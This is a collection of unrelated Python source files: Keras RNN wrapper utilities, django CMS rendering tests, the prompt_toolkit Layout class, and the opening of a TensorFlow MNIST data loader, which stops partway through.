with tf.compat.v1.device(self._device):
return self.cell.zero_state(batch_size, dtype)
def _call_wrapped_cell(self, inputs, state, cell_call_fn, **kwargs):
"""Run the cell on specified device."""
with tf.compat.v1.device(self._device):
return cell_call_fn(inputs, state, **kwargs)
def get_config(self):
config = {"device": self._device}
base_config = super(DeviceWrapper, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def _serialize_function_to_config(function):
"""Serialize the function for get_config()."""
if isinstance(function, python_types.LambdaType):
output = generic_utils.func_dump(function)
output_type = "lambda"
module = function.__module__
elif callable(function):
output = function.__name__
output_type = "function"
module = function.__module__
else:
raise ValueError(
f"Unrecognized function type for input: {type(function)}")
return output, output_type, module
def _parse_config_to_function(config, custom_objects, func_attr_name,
func_type_attr_name, module_attr_name):
"""Reconstruct the function from the config."""
globs = globals()
module = config.pop(module_attr_name, None)
if module in sys.modules:
globs.update(sys.modules[module].__dict__)
elif module is not None:
# Note: we don't know the name of the function if it's a lambda.
warnings.warn(
"{} is not loaded, but a layer uses it. "
"It may cause errors.".format(module),
UserWarning,
stacklevel=2)
if custom_objects:
globs.update(custom_objects)
function_type = config.pop(func_type_attr_name)
if function_type == "function":
# Simple lookup in custom objects
function = generic_utils.deserialize_keras_object(
config[func_attr_name],
custom_objects=custom_objects,
printable_module_name="function in wrapper")
elif function_type == "lambda":
# Unsafe deserialization from bytecode
function = generic_utils.func_load(
config[func_attr_name], globs=globs)
else:
raise TypeError(
f"Unknown function type received: {function_type}. "
"Expected types are ['function', 'lambda']")
return function
def _default_dropout_state_filter_visitor(substate):
return not isinstance(substate, tf.TensorArray)
def _enumerated_map_structure_up_to(shallow_structure, map_fn, *args, **kwargs):
ix = [0]
def enumerated_fn(*inner_args, **inner_kwargs):
r = map_fn(ix[0], *inner_args, **inner_kwargs)
ix[0] += 1
return r
return tf.__internal__.nest.map_structure_up_to(shallow_structure,
enumerated_fn, *args,
**kwargs)
|
|
# -*- coding: utf-8 -*-
from __future__ import with_statement
from django.core.cache import cache
from django.template import Template, RequestContext
from django.test.utils import override_settings
from sekizai.context import SekizaiContext
from cms import plugin_rendering
from cms.api import create_page, add_plugin
from cms.models import Page
from cms.models.placeholdermodel import Placeholder
from cms.models.pluginmodel import CMSPlugin
from cms.plugin_rendering import render_plugins, PluginContext, render_placeholder_toolbar
from cms.templatetags.cms_tags import _clean_key, _get_cache_key
from cms.test_utils.project.placeholderapp.models import Example1
from cms.test_utils.testcases import CMSTestCase
from cms.test_utils.util.context_managers import ChangeModel
from cms.test_utils.util.mock import AttributeObject
from cms.views import details
TEMPLATE_NAME = 'tests/rendering/base.html'
def sample_plugin_processor(instance, placeholder, rendered_content, original_context):
original_context_var = original_context['original_context_var']
return '%s|test_plugin_processor_ok|%s|%s|%s' % (
rendered_content,
instance.body,
placeholder.slot,
original_context_var
)
def sample_plugin_context_processor(instance, placeholder, original_context):
content = 'test_plugin_context_processor_ok|' + instance.body + '|' + \
placeholder.slot + '|' + original_context['original_context_var']
return {
'test_plugin_context_processor': content,
}
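# The two sample processors above are not registered globally; the tests below
# wire them up through the CMS_PLUGIN_PROCESSORS and
# CMS_PLUGIN_CONTEXT_PROCESSORS settings overrides.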
@override_settings(
CMS_TEMPLATES=[(TEMPLATE_NAME, TEMPLATE_NAME), ('extra_context.html', 'extra_context.html')],
)
class RenderingTestCase(CMSTestCase):
def setUp(self):
super(RenderingTestCase, self).setUp()
self.test_user = self._create_user("test", True, True)
with self.login_user_context(self.test_user):
self.test_data = {
'title': u'RenderingTestCase-title',
'slug': u'renderingtestcase-slug',
'reverse_id': u'renderingtestcase-reverse-id',
'text_main': u'RenderingTestCase-main',
'text_sub': u'RenderingTestCase-sub',
}
self.test_data2 = {
'title': u'RenderingTestCase-title2',
'slug': u'RenderingTestCase-slug2',
'reverse_id': u'renderingtestcase-reverse-id2',
}
self.test_data3 = {
'title': u'RenderingTestCase-title3',
'slug': u'RenderingTestCase-slug3',
'reverse_id': u'renderingtestcase-reverse-id3',
'text_sub': u'RenderingTestCase-sub3',
}
self.test_data4 = {
'title': u'RenderingTestCase-title3',
'no_extra': u'no extra var!',
'placeholderconf': {'extra_context': {'extra_context': {'extra_var': 'found extra var'}}},
'extra': u'found extra var',
}
self.insert_test_content()
def insert_test_content(self):
# Insert a page
p = create_page(self.test_data['title'], TEMPLATE_NAME, 'en',
slug=self.test_data['slug'], created_by=self.test_user,
reverse_id=self.test_data['reverse_id'], published=True)
# Placeholders have been inserted on post_save signal:
self.test_placeholders = {}
for placeholder in p.placeholders.all():
self.test_placeholders[placeholder.slot] = placeholder
# Insert some test Text plugins
add_plugin(self.test_placeholders['main'], 'TextPlugin', 'en',
body=self.test_data['text_main'])
add_plugin(self.test_placeholders['sub'], 'TextPlugin', 'en',
body=self.test_data['text_sub'])
p.publish('en')
# Insert another page that is not the home page
p2 = create_page(self.test_data2['title'], TEMPLATE_NAME, 'en',
parent=p, slug=self.test_data2['slug'], published=True,
reverse_id=self.test_data2['reverse_id'])
p2.publish('en')
# Insert another page that is not the home page
p3 = create_page(self.test_data3['title'], TEMPLATE_NAME, 'en',
slug=self.test_data3['slug'], parent=p2,
reverse_id=self.test_data3['reverse_id'], published=True)
# Placeholders have been inserted on post_save signal:
self.test_placeholders3 = {}
for placeholder in p3.placeholders.all():
self.test_placeholders3[placeholder.slot] = placeholder
        # Insert some test Text plugins
add_plugin(self.test_placeholders3['sub'], 'TextPlugin', 'en',
body=self.test_data3['text_sub'])
p3.publish('en')
        # Insert another page that is not the home page
p4 = create_page(self.test_data4['title'], 'extra_context.html', 'en', parent=p)
# Placeholders have been inserted on post_save signal:
self.test_placeholders4 = {}
for placeholder in p4.placeholders.all():
self.test_placeholders4[placeholder.slot] = placeholder
# Insert some test plugins
add_plugin(self.test_placeholders4['extra_context'], 'ExtraContextPlugin', 'en')
p4.publish('en')
# Reload test pages
self.test_page = self.reload(p.publisher_public)
self.test_page2 = self.reload(p2.publisher_public)
self.test_page3 = self.reload(p3.publisher_public)
self.test_page4 = self.reload(p4.publisher_public)
def get_context(self, page, context_vars={}):
request = self.get_request(page)
return RequestContext(request, context_vars)
def get_request(self, page, *args, **kwargs):
request = super(RenderingTestCase, self).get_request(*args, **kwargs)
request.current_page = page
return request
def strip_rendered(self, content):
return content.strip().replace(u"\n", u"")
@override_settings(CMS_TEMPLATES=[(TEMPLATE_NAME, '')])
def render(self, template, page, context_vars={}):
c = self.get_context(page, context_vars)
t = Template(template)
r = t.render(c)
return self.strip_rendered(r)
@override_settings(CMS_TEMPLATES=[(TEMPLATE_NAME, '')])
def test_details_view(self):
"""
Tests that the `detail` view is working.
"""
response = details(self.get_request(self.test_page), '')
response.render()
r = self.strip_rendered(response.content.decode('utf8'))
self.assertEqual(r, u'|' + self.test_data['text_main'] + u'|' + self.test_data['text_sub'] + u'|')
@override_settings(
CMS_PLUGIN_PROCESSORS=('cms.tests.rendering.sample_plugin_processor',),
CMS_PLUGIN_CONTEXT_PROCESSORS=('cms.tests.rendering.sample_plugin_context_processor',),
)
def test_processors(self):
"""
Tests that default plugin context processors are working, that plugin processors and plugin context processors
can be defined in settings and are working and that extra plugin context processors can be passed to PluginContext.
"""
def test_passed_plugin_context_processor(instance, placeholder, context):
return {'test_passed_plugin_context_processor': 'test_passed_plugin_context_processor_ok'}
t = u'{% load cms_tags %}' + \
u'{{ plugin.counter }}|{{ plugin.instance.body }}|{{ test_passed_plugin_context_processor }}|{{ test_plugin_context_processor }}'
instance, plugin = CMSPlugin.objects.all()[0].get_plugin_instance()
instance.render_template = Template(t)
context = PluginContext({'original_context_var': 'original_context_var_ok'}, instance,
self.test_placeholders['main'], processors=(test_passed_plugin_context_processor,))
plugin_rendering._standard_processors = {}
c = render_plugins((instance,), context, self.test_placeholders['main'])
r = "".join(c)
self.assertEqual(r, u'1|' + self.test_data[
'text_main'] + '|test_passed_plugin_context_processor_ok|test_plugin_context_processor_ok|' +
self.test_data['text_main'] + '|main|original_context_var_ok|test_plugin_processor_ok|' + self.test_data[
'text_main'] + '|main|original_context_var_ok')
plugin_rendering._standard_processors = {}
def test_placeholder(self):
"""
Tests the {% placeholder %} templatetag.
"""
t = u'{% load cms_tags %}' + \
u'|{% placeholder "main" %}|{% placeholder "empty" %}'
r = self.render(t, self.test_page)
self.assertEqual(r, u'|' + self.test_data['text_main'] + '|')
def test_placeholder_extra_context(self):
t = u'{% load cms_tags %}{% placeholder "extra_context" %}'
r = self.render(t, self.test_page4)
self.assertEqual(r, self.test_data4['no_extra'])
cache.clear()
with self.settings(CMS_PLACEHOLDER_CONF=self.test_data4['placeholderconf']):
r = self.render(t, self.test_page4)
self.assertEqual(r, self.test_data4['extra'])
def test_placeholder_or(self):
"""
Tests the {% placeholder %} templatetag.
"""
t = u'{% load cms_tags %}' + \
u'|{% placeholder "empty" or %}No content{% endplaceholder %}'
r = self.render(t, self.test_page)
self.assertEqual(r, u'|No content')
def test_render_placeholder_tag(self):
"""
Tests the {% render_placeholder %} templatetag.
"""
render_placeholder_body = "I'm the render placeholder body"
ex1 = Example1(char_1="char_1", char_2="char_2", char_3="char_3",
char_4="char_4")
ex1.save()
add_plugin(ex1.placeholder, u"TextPlugin", u"en", body=render_placeholder_body)
t = '''{% extends "base.html" %}
{% load cms_tags %}
{% block content %}
<h1>{% render_placeholder ex1.placeholder %}</h1>
<h2>{% render_placeholder ex1.placeholder as tempvar %}</h2>
<h3>{{ tempvar }}</h3>
{% endblock content %}
'''
r = self.render(t, self.test_page, {'ex1': ex1})
self.assertIn(
'<h1>%s</h1>' % render_placeholder_body,
r
)
self.assertIn(
'<h2></h2>',
r
)
self.assertIn(
'<h3>%s</h3>' % render_placeholder_body,
r
)
def test_render_uncached_placeholder_tag(self):
"""
Tests the {% render_uncached_placeholder %} templatetag.
"""
render_uncached_placeholder_body = "I'm the render uncached placeholder body"
ex1 = Example1(char_1="char_1", char_2="char_2", char_3="char_3",
char_4="char_4")
ex1.save()
add_plugin(ex1.placeholder, u"TextPlugin", u"en", body=render_uncached_placeholder_body)
t = '''{% extends "base.html" %}
{% load cms_tags %}
{% block content %}
<h1>{% render_uncached_placeholder ex1.placeholder %}</h1>
<h2>{% render_uncached_placeholder ex1.placeholder as tempvar %}</h2>
<h3>{{ tempvar }}</h3>
{% endblock content %}
'''
r = self.render(t, self.test_page, {'ex1': ex1})
self.assertIn(
'<h1>%s</h1>' % render_uncached_placeholder_body,
r
)
self.assertIn(
'<h2></h2>',
r
)
self.assertIn(
'<h3>%s</h3>' % render_uncached_placeholder_body,
r
)
def test_render_uncached_placeholder_tag_no_use_cache(self):
"""
Tests that {% render_uncached_placeholder %} does not populate cache.
"""
render_uncached_placeholder_body = "I'm the render uncached placeholder body"
ex1 = Example1(char_1="char_1", char_2="char_2", char_3="char_3",
char_4="char_4")
ex1.save()
add_plugin(ex1.placeholder, u"TextPlugin", u"en", body=render_uncached_placeholder_body)
template = '{% load cms_tags %}<h1>{% render_uncached_placeholder ex1.placeholder %}</h1>'
cache_key = ex1.placeholder.get_cache_key(u"en")
cache_value_before = cache.get(cache_key)
self.render(template, self.test_page, {'ex1': ex1})
cache_value_after = cache.get(cache_key)
self.assertEqual(cache_value_before, cache_value_after)
self.assertIsNone(cache_value_after)
def test_render_placeholder_tag_use_cache(self):
"""
Tests that {% render_placeholder %} populates cache.
"""
render_placeholder_body = "I'm the render placeholder body"
ex1 = Example1(char_1="char_1", char_2="char_2", char_3="char_3",
char_4="char_4")
ex1.save()
add_plugin(ex1.placeholder, u"TextPlugin", u"en", body=render_placeholder_body)
template = '{% load cms_tags %}<h1>{% render_placeholder ex1.placeholder %}</h1>'
cache_key = ex1.placeholder.get_cache_key(u"en")
cache_value_before = cache.get(cache_key)
self.render(template, self.test_page, {'ex1': ex1})
cache_value_after = cache.get(cache_key)
self.assertNotEqual(cache_value_before, cache_value_after)
self.assertIsNone(cache_value_before)
self.assertIsNotNone(cache_value_after)
def test_show_placeholder(self):
"""
Tests the {% show_placeholder %} templatetag, using lookup by pk/dict/reverse_id and passing a Page object.
"""
t = u'{% load cms_tags %}' + \
u'|{% show_placeholder "main" ' + str(self.test_page.pk) + ' %}' + \
u'|{% show_placeholder "main" test_dict %}' + \
u'|{% show_placeholder "sub" "' + str(self.test_page.reverse_id) + '" %}' + \
u'|{% show_placeholder "sub" test_page %}'
r = self.render(t, self.test_page, {'test_page': self.test_page, 'test_dict': {'pk': self.test_page.pk}})
self.assertEqual(r, (u'|' + self.test_data['text_main']) * 2 + (u'|' + self.test_data['text_sub']) * 2)
def test_show_placeholder_extra_context(self):
t = u'{% load cms_tags %}{% show_uncached_placeholder "extra_context" ' + str(self.test_page4.pk) + ' %}'
r = self.render(t, self.test_page4)
self.assertEqual(r, self.test_data4['no_extra'])
cache.clear()
with self.settings(CMS_PLACEHOLDER_CONF=self.test_data4['placeholderconf']):
r = self.render(t, self.test_page4)
self.assertEqual(r, self.test_data4['extra'])
def test_show_uncached_placeholder_by_pk(self):
"""
Tests the {% show_uncached_placeholder %} templatetag, using lookup by pk.
"""
template = u'{%% load cms_tags %%}{%% show_uncached_placeholder "main" %s %%}' % self.test_page.pk
output = self.render(template, self.test_page)
self.assertEqual(output, self.test_data['text_main'])
def test_show_uncached_placeholder_by_lookup_dict(self):
template = u'{% load cms_tags %}{% show_uncached_placeholder "main" test_dict %}'
output = self.render(template, self.test_page, {'test_dict': {'pk': self.test_page.pk}})
self.assertEqual(output, self.test_data['text_main'])
def test_show_uncached_placeholder_by_reverse_id(self):
template = u'{%% load cms_tags %%}{%% show_uncached_placeholder "sub" "%s" %%}' % self.test_page.reverse_id
output = self.render(template, self.test_page)
self.assertEqual(output, self.test_data['text_sub'])
def test_show_uncached_placeholder_by_page(self):
template = u'{% load cms_tags %}{% show_uncached_placeholder "sub" test_page %}'
output = self.render(template, self.test_page, {'test_page': self.test_page})
self.assertEqual(output, self.test_data['text_sub'])
def test_show_uncached_placeholder_tag_no_use_cache(self):
"""
Tests that {% show_uncached_placeholder %} does not populate cache.
"""
template = '{% load cms_tags %}<h1>{% show_uncached_placeholder "sub" test_page %}</h1>'
base_key = _get_cache_key('_show_placeholder_for_page', self.test_page, "en",
self.test_page.site_id)
cache_key = _clean_key('%s_placeholder:%s' % (base_key, "sub"))
cache_value_before = cache.get(cache_key)
output = self.render(template, self.test_page, {'test_page': self.test_page})
cache_value_after = cache.get(cache_key)
self.assertEqual(output, '<h1>%s</h1>' % self.test_data['text_sub'])
self.assertEqual(cache_value_before, cache_value_after)
self.assertIsNone(cache_value_after)
def test_page_url_by_pk(self):
template = u'{%% load cms_tags %%}{%% page_url %s %%}' % self.test_page2.pk
output = self.render(template, self.test_page)
self.assertEqual(output, self.test_page2.get_absolute_url())
def test_page_url_by_dictionary(self):
template = u'{% load cms_tags %}{% page_url test_dict %}'
output = self.render(template, self.test_page, {'test_dict': {'pk': self.test_page2.pk}})
self.assertEqual(output, self.test_page2.get_absolute_url())
def test_page_url_by_reverse_id(self):
template = u'{%% load cms_tags %%}{%% page_url "%s" %%}' % self.test_page2.reverse_id
output = self.render(template, self.test_page)
self.assertEqual(output, self.test_page2.get_absolute_url())
def test_page_url_by_reverse_id_not_on_a_page(self):
template = u'{%% load cms_tags %%}{%% page_url "%s" %%}' % self.test_page2.reverse_id
output = self.render(template, None)
self.assertEqual(output, self.test_page2.get_absolute_url())
def test_page_url_by_page(self):
template = u'{% load cms_tags %}{% page_url test_page %}'
output = self.render(template, self.test_page, {'test_page': self.test_page2})
self.assertEqual(output, self.test_page2.get_absolute_url())
def test_page_url_by_page_as(self):
template = u'{% load cms_tags %}{% page_url test_page as test_url %}{{ test_url }}'
output = self.render(template, self.test_page, {'test_page': self.test_page2})
self.assertEqual(output, self.test_page2.get_absolute_url())
#
# To ensure compatible behaviour, test that page_url swallows any
# Page.DoesNotExist exceptions when NOT in DEBUG mode.
#
@override_settings(DEBUG=False)
def test_page_url_on_bogus_page(self):
template = u'{% load cms_tags %}{% page_url "bogus_page" %}'
output = self.render(template, self.test_page, {'test_page': self.test_page2})
self.assertEqual(output, '')
#
# To ensure compatible behaviour, test that page_url will raise a
# Page.DoesNotExist exception when the page argument does not eval to a
# valid page
#
@override_settings(DEBUG=True)
def test_page_url_on_bogus_page_in_debug(self):
template = u'{% load cms_tags %}{% page_url "bogus_page" %}'
self.assertRaises(
Page.DoesNotExist,
self.render,
template,
self.test_page,
{'test_page': self.test_page2}
)
#
# In the 'as varname' form, ensure that the tag will always swallow
# Page.DoesNotExist exceptions both when DEBUG is False and...
#
@override_settings(DEBUG=False)
def test_page_url_as_on_bogus_page(self):
template = u'{% load cms_tags %}{% page_url "bogus_page" as test_url %}{{ test_url }}'
output = self.render(template, self.test_page, {'test_page': self.test_page2})
self.assertEqual(output, '')
#
# ...when it is True.
#
@override_settings(DEBUG=True)
def test_page_url_as_on_bogus_page_in_debug(self):
template = u'{% load cms_tags %}{% page_url "bogus_page" as test_url %}{{ test_url }}'
output = self.render(template, self.test_page, {'test_page': self.test_page2})
self.assertEqual(output, '')
def test_page_attribute(self):
"""
Tests the {% page_attribute %} templatetag, using current page, lookup by pk/dict/reverse_id and passing a Page object.
"""
t = u'{% load cms_tags %}' + \
u'|{% page_attribute title %}' + \
u'{% page_attribute title as title %}' + \
u'|{{ title }}' + \
u'|{% page_attribute title ' + str(self.test_page2.pk) + ' %}' + \
u'{% page_attribute title ' + str(self.test_page2.pk) + ' as title %}' + \
u'|{{ title }}' + \
u'|{% page_attribute title test_dict %}' + \
u'{% page_attribute title test_dict as title %}' + \
u'|{{ title }}' + \
u'|{% page_attribute slug "' + str(self.test_page2.reverse_id) + '" %}' + \
u'{% page_attribute slug "' + str(self.test_page2.reverse_id) + '" as slug %}' + \
u'|{{ slug }}' + \
u'|{% page_attribute slug test_page %}' + \
u'{% page_attribute slug test_page as slug %}' + \
u'|{{ slug }}'
r = self.render(t, self.test_page, {'test_page': self.test_page2, 'test_dict': {'pk': self.test_page2.pk}})
self.assertEqual(r, (u'|' + self.test_data['title']) * 2 + (u'|' + self.test_data2['title']) * 4 + (
u'|' + self.test_data2['slug']) * 4)
def test_inherit_placeholder(self):
t = u'{% load cms_tags %}' + \
u'|{% placeholder "main" inherit %}|{% placeholder "sub" %}'
r = self.render(t, self.test_page3)
self.assertEqual(r, u'|' + self.test_data['text_main'] + '|' + self.test_data3['text_sub'])
def test_extra_context_isolation(self):
with ChangeModel(self.test_page, template='extra_context.html'):
response = self.client.get(self.test_page.get_absolute_url())
self.assertTrue('width' not in response.context)
def test_render_placeholder_toolbar(self):
placeholder = Placeholder()
placeholder.slot = 'test'
placeholder.pk = placeholder.id = 99
context = SekizaiContext()
context['request'] = AttributeObject(
REQUEST={'language': 'en'},
GET=[],
session={},
path='/',
user=self.test_user,
current_page=None,
method='GET',
)
classes = [
"cms_placeholder-%s" % placeholder.pk,
'cms_placeholder',
]
output = render_placeholder_toolbar(placeholder, context, 'test', 'en')
for cls in classes:
self.assertTrue(cls in output, '%r is not in %r' % (cls, output))
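# --- Illustrative note (editor's addition, not part of the original test file) ---
# The `self.render(template, page, context)` helper used throughout these tests
# is defined elsewhere in the suite; conceptually it compiles the template
# string and renders it against a request context carrying the given page,
# roughly equivalent to:
#
#     from django.template import Context, Template
#     output = Template(template_source).render(Context(context_dict))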
|
|
"""
Wrapper for the layout.
"""
from typing import Dict, Generator, Iterable, List, Optional, Union
from prompt_toolkit.buffer import Buffer
from .containers import (
AnyContainer,
ConditionalContainer,
Container,
Window,
to_container,
)
from .controls import BufferControl, SearchBufferControl, UIControl
__all__ = [
"Layout",
"InvalidLayoutError",
"walk",
]
FocusableElement = Union[str, Buffer, UIControl, AnyContainer]
class Layout:
"""
The layout for a prompt_toolkit
:class:`~prompt_toolkit.application.Application`.
This also keeps track of which user control is focused.
:param container: The "root" container for the layout.
:param focused_element: element to be focused initially. (Can be anything
the `focus` function accepts.)
"""
def __init__(
self,
container: AnyContainer,
focused_element: Optional[FocusableElement] = None,
) -> None:
self.container = to_container(container)
self._stack: List[Window] = []
# Map search BufferControl back to the original BufferControl.
# This is used to keep track of when exactly we are searching, and for
# applying the search.
# When a link exists in this dictionary, that means the search is
# currently active.
# Map: search_buffer_control -> original buffer control.
self.search_links: Dict[SearchBufferControl, BufferControl] = {}
# Mapping that maps the children in the layout to their parent.
# This relationship is calculated dynamically, each time when the UI
# is rendered. (UI elements have only references to their children.)
self._child_to_parent: Dict[Container, Container] = {}
if focused_element is None:
try:
self._stack.append(next(self.find_all_windows()))
except StopIteration as e:
raise InvalidLayoutError(
"Invalid layout. The layout does not contain any Window object."
) from e
else:
self.focus(focused_element)
# List of visible windows.
self.visible_windows: List[Window] = [] # List of `Window` objects.
def __repr__(self) -> str:
return "Layout(%r, current_window=%r)" % (self.container, self.current_window)
def find_all_windows(self) -> Generator[Window, None, None]:
"""
Find all the :class:`.Window` objects in this layout.
"""
for item in self.walk():
if isinstance(item, Window):
yield item
def find_all_controls(self) -> Iterable[UIControl]:
for container in self.find_all_windows():
yield container.content
def focus(self, value: FocusableElement) -> None:
"""
Focus the given UI element.
`value` can be either:
- a :class:`.UIControl`
- a :class:`.Buffer` instance or the name of a :class:`.Buffer`
- a :class:`.Window`
- Any container object. In this case we will focus the :class:`.Window`
from this container that was focused most recently, or the very first
focusable :class:`.Window` of the container.
"""
# BufferControl by buffer name.
if isinstance(value, str):
for control in self.find_all_controls():
if isinstance(control, BufferControl) and control.buffer.name == value:
self.focus(control)
return
raise ValueError(
"Couldn't find Buffer in the current layout: %r." % (value,)
)
# BufferControl by buffer object.
elif isinstance(value, Buffer):
for control in self.find_all_controls():
if isinstance(control, BufferControl) and control.buffer == value:
self.focus(control)
return
raise ValueError(
"Couldn't find Buffer in the current layout: %r." % (value,)
)
# Focus UIControl.
elif isinstance(value, UIControl):
if value not in self.find_all_controls():
raise ValueError(
"Invalid value. Container does not appear in the layout."
)
if not value.is_focusable():
raise ValueError("Invalid value. UIControl is not focusable.")
self.current_control = value
# Otherwise, expecting any Container object.
else:
value = to_container(value)
if isinstance(value, Window):
# This is a `Window`: focus that.
if value not in self.find_all_windows():
raise ValueError(
"Invalid value. Window does not appear in the layout: %r"
% (value,)
)
self.current_window = value
else:
# Focus a window in this container.
# If we have many windows as part of this container, and some
# of them have been focused before, take the last focused
# item. (This is very useful when the UI is composed of more
# complex sub components.)
windows = []
for c in walk(value, skip_hidden=True):
if isinstance(c, Window) and c.content.is_focusable():
windows.append(c)
# Take the first one that was focused before.
for w in reversed(self._stack):
if w in windows:
self.current_window = w
return
# None was focused before: take the very first focusable window.
if windows:
self.current_window = windows[0]
return
raise ValueError(
"Invalid value. Container cannot be focused: %r" % (value,)
)
def has_focus(self, value: FocusableElement) -> bool:
"""
Check whether the given control has the focus.
:param value: :class:`.UIControl` or :class:`.Window` instance.
"""
if isinstance(value, str):
if self.current_buffer is None:
return False
return self.current_buffer.name == value
if isinstance(value, Buffer):
return self.current_buffer == value
if isinstance(value, UIControl):
return self.current_control == value
else:
value = to_container(value)
if isinstance(value, Window):
return self.current_window == value
else:
# Check whether this "container" is focused. This is true if
# one of the elements inside is focused.
for element in walk(value):
if element == self.current_window:
return True
return False
@property
def current_control(self) -> UIControl:
"""
Get the :class:`.UIControl` that currently has the focus.
"""
return self._stack[-1].content
@current_control.setter
def current_control(self, control: UIControl) -> None:
"""
Set the :class:`.UIControl` to receive the focus.
"""
for window in self.find_all_windows():
if window.content == control:
self.current_window = window
return
raise ValueError("Control not found in the user interface.")
@property
def current_window(self) -> Window:
" Return the :class:`.Window` object that is currently focused. "
return self._stack[-1]
@current_window.setter
def current_window(self, value: Window):
" Set the :class:`.Window` object to be currently focused. "
self._stack.append(value)
@property
def is_searching(self) -> bool:
" True if we are searching right now. "
return self.current_control in self.search_links
@property
def search_target_buffer_control(self) -> Optional[BufferControl]:
"""
Return the :class:`.BufferControl` in which we are searching or `None`.
"""
# Not every `UIControl` is a `BufferControl`. This only applies to
# `BufferControl`.
control = self.current_control
if isinstance(control, SearchBufferControl):
return self.search_links.get(control)
else:
return None
def get_focusable_windows(self) -> Iterable[Window]:
"""
Return all the :class:`.Window` objects which are focusable (in the
'modal' area).
"""
for w in self.walk_through_modal_area():
if isinstance(w, Window) and w.content.is_focusable():
yield w
def get_visible_focusable_windows(self) -> List[Window]:
"""
Return a list of :class:`.Window` objects that are both visible and focusable.
"""
# focusable windows are windows that are visible, but also part of the
# modal container. Make sure to keep the ordering.
visible_windows = self.visible_windows
return [w for w in self.get_focusable_windows() if w in visible_windows]
@property
def current_buffer(self) -> Optional[Buffer]:
"""
The currently focused :class:`~.Buffer` or `None`.
"""
ui_control = self.current_control
if isinstance(ui_control, BufferControl):
return ui_control.buffer
return None
def get_buffer_by_name(self, buffer_name: str) -> Optional[Buffer]:
"""
Look in the layout for a buffer with the given name.
Return `None` when nothing was found.
"""
for w in self.walk():
if isinstance(w, Window) and isinstance(w.content, BufferControl):
if w.content.buffer.name == buffer_name:
return w.content.buffer
return None
@property
def buffer_has_focus(self) -> bool:
"""
Return `True` if the currently focused control is a
:class:`.BufferControl`. (For instance, used to determine whether the
default key bindings should be active or not.)
"""
ui_control = self.current_control
return isinstance(ui_control, BufferControl)
@property
def previous_control(self) -> UIControl:
"""
Get the :class:`.UIControl` that previously had the focus.
"""
try:
return self._stack[-2].content
except IndexError:
return self._stack[-1].content
def focus_last(self) -> None:
"""
Give the focus to the last focused control.
"""
if len(self._stack) > 1:
self._stack = self._stack[:-1]
def focus_next(self) -> None:
"""
Focus the next visible/focusable Window.
"""
windows = self.get_visible_focusable_windows()
if len(windows) > 0:
try:
index = windows.index(self.current_window)
except ValueError:
index = 0
else:
index = (index + 1) % len(windows)
self.focus(windows[index])
def focus_previous(self) -> None:
"""
Focus the previous visible/focusable Window.
"""
windows = self.get_visible_focusable_windows()
if len(windows) > 0:
try:
index = windows.index(self.current_window)
except ValueError:
index = 0
else:
index = (index - 1) % len(windows)
self.focus(windows[index])
def walk(self) -> Iterable[Container]:
"""
Walk through all the layout nodes (and their children) and yield them.
"""
for i in walk(self.container):
yield i
def walk_through_modal_area(self) -> Iterable[Container]:
"""
Walk through all the containers which are in the current 'modal' part
of the layout.
"""
# Go up in the tree, and find the root. (it will be a part of the
# layout, if the focus is in a modal part.)
root: Container = self.current_window
while not root.is_modal() and root in self._child_to_parent:
root = self._child_to_parent[root]
for container in walk(root):
yield container
def update_parents_relations(self) -> None:
"""
Update child->parent relationships mapping.
"""
parents = {}
def walk(e: Container) -> None:
for c in e.get_children():
parents[c] = e
walk(c)
walk(self.container)
self._child_to_parent = parents
def reset(self) -> None:
# Remove all search links when the UI starts.
# (Important, for instance when control-c has been pressed while
# searching. The prompt cancels, but at the next `run()` call the search
# links would still be there.)
self.search_links.clear()
self.container.reset()
def get_parent(self, container: Container) -> Optional[Container]:
"""
Return the parent container for the given container, or ``None``, if it
wasn't found.
"""
try:
return self._child_to_parent[container]
except KeyError:
return None
class InvalidLayoutError(Exception):
pass
def walk(container: Container, skip_hidden: bool = False) -> Iterable[Container]:
"""
Walk through layout, starting at this container.
"""
# When `skip_hidden` is set, don't go into disabled ConditionalContainer containers.
if (
skip_hidden
and isinstance(container, ConditionalContainer)
and not container.filter()
):
return
yield container
for c in container.get_children():
yield from walk(c, skip_hidden=skip_hidden)
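# --- Illustrative sketch (editor's addition, not part of the original module) ---
# Minimal example of wiring a Layout and moving focus by buffer name through the
# public API; the container structure and buffer names are invented for
# illustration.
#
#     from prompt_toolkit.buffer import Buffer
#     from prompt_toolkit.layout import HSplit, Layout, Window
#     from prompt_toolkit.layout.controls import BufferControl
#
#     edit_buffer = Buffer(name="editor")
#     log_buffer = Buffer(name="log")
#     layout = Layout(
#         HSplit([
#             Window(BufferControl(buffer=edit_buffer)),
#             Window(BufferControl(buffer=log_buffer)),
#         ]),
#         focused_element=edit_buffer,
#     )
#     layout.focus("log")                  # focus by buffer name (see focus() above)
#     assert layout.has_focus(log_buffer)
#     layout.focus_last()                  # back to the previously focused window
#     assert layout.current_buffer is edit_buffer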
|
|
"""Functions for downloading and reading MNIST data."""
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import tempfile
import numpy
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.platform.default import _gfile as gfile
from tensorflow.python.framework import dtypes
from tensorflow.contrib.learn.python.learn.datasets import base
SOURCE_URL = 'http://yann.lecun.com/exdb/mnist/'
def _read32(bytestream):
dt = numpy.dtype(numpy.uint32).newbyteorder('>')
return numpy.frombuffer(bytestream.read(4), dtype=dt)[0]
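# --- Illustrative note (editor's addition) --- the IDX headers are big-endian
# uint32 values, which is why _read32 forces the '>' byte order. For example:
#
#     >>> numpy.frombuffer(b'\x00\x00\x08\x03',
#     ...                  dtype=numpy.dtype(numpy.uint32).newbyteorder('>'))[0]
#     2051
#
# 2051 is the magic number checked in extract_images() below.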
def extract_images(filename):
"""Extract the images into a 4D uint8 numpy array [index, y, x, depth]."""
print('Extracting', filename)
with gfile.Open(filename, 'rb') as f, gzip.GzipFile(fileobj=f) as bytestream:
magic = _read32(bytestream)
if magic != 2051:
raise ValueError(
'Invalid magic number %d in MNIST image file: %s' %
(magic, filename))
num_images = _read32(bytestream)
